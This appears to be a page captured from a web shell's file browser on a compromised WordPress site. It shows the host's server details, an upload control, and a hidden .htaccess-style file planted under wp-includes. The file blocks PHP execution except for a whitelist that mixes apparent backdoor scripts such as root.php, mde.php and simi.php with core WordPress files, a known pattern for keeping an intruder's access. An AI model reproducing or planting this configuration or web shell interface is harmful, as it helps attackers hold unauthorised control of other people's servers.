HEX
Server: Apache
System: Linux 65-254-81-60.cprapid.com 4.18.0-477.27.2.el8_8.x86_64 #1 SMP Fri Sep 29 08:21:01 EDT 2023 x86_64
User: roshanchandy (1003)
PHP: 8.4.12
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/roshanchandy/public_html/buildmydesign.in/wp-includes/backups/.add
<FilesMatch ".(PhP|php7|php5|suspected|phtml|py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(root.php|mde.php|simi.php|wordfence-waf.php|error.php|index.php|amin-ajaxson.php|class-wp-edits.php|Mailo.php|consol.php|module.audio.flow.php|nux.php|icon.php|colour.php|contact.php|foter.php|header.php|module.php|register.php|profile.php|webix.php|wincust.php|service.php|wp-login.php|wp-blog-header.php|admin-ajax.php|wp-config.php|wp-db.php|pluggable.php|wp-config-sample.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>

# Custom error handling
ErrorDocument 403 /index.php
ErrorDocument 404 /index.php